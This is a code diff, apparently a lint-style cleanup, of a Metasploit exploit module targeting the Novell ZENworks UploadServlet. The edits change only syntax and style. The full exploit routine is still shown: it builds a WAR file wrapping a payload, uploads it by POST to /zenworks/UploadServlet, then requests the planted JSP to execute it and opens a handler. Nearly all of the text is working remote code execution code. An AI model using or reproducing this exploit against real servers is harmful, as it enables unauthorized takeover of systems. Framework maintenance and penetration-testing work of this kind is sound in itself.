@@ -6,7 +6,7 @@
 class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
-  HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] }
+  HttpFingerprint = { pattern: [ /Apache-Coyote/ ] }
 
   include Msf::Exploit::Remote::HttpClient
   include Msf::Exploit::EXE
@@ -32,7 +32,6 @@ class MetasploitModule < Msf::Exploit::Remote
           [ 'URL', 'http://www.novell.com/support/kb/doc.php?id=7005573' ]
         ],
         'Privileged' => true,
-        'Platform' => %w{java linux win},
         'Targets' => [
           [
             'Java Universal',
@@ -70,16 +69,16 @@ class MetasploitModule < Msf::Exploit::Remote
   def exploit
     # Generate the WAR containing the EXE containing the payload
     app_base = rand_text_alphanumeric(4 + rand(32 - 4))
-    jsp_name = rand_text_alphanumeric(8 + rand(8))
+    jsp_name = rand_text_alphanumeric(rand(8..15))
 
-    war_data = payload.encoded_war(:app_name => app_base, :jsp_name => jsp_name).to_s
+    war_data = payload.encoded_war(app_name: app_base, jsp_name: jsp_name).to_s
 
     res = send_request_cgi({
       'uri' => '/zenworks/UploadServlet',
       'method' => 'POST',
       'data' => war_data,
       'headers' => {
-        'Content-Type' => 'application/octet-stream',
+        'Content-Type' => 'application/octet-stream'
       },
       'encode_params' => false,
       'vars_get' => {
@@ -96,11 +95,11 @@ class MetasploitModule < Msf::Exploit::Remote
       send_request_raw(
         {
           'uri' => "/#{app_base}/" + "#{jsp_name}" + '.jsp',
-          'method' => 'GET',
+          'method' => 'GET'
         }
       )
     else
-      print_error("Denied...")
+      print_error('Denied...')
     end
 
     handler
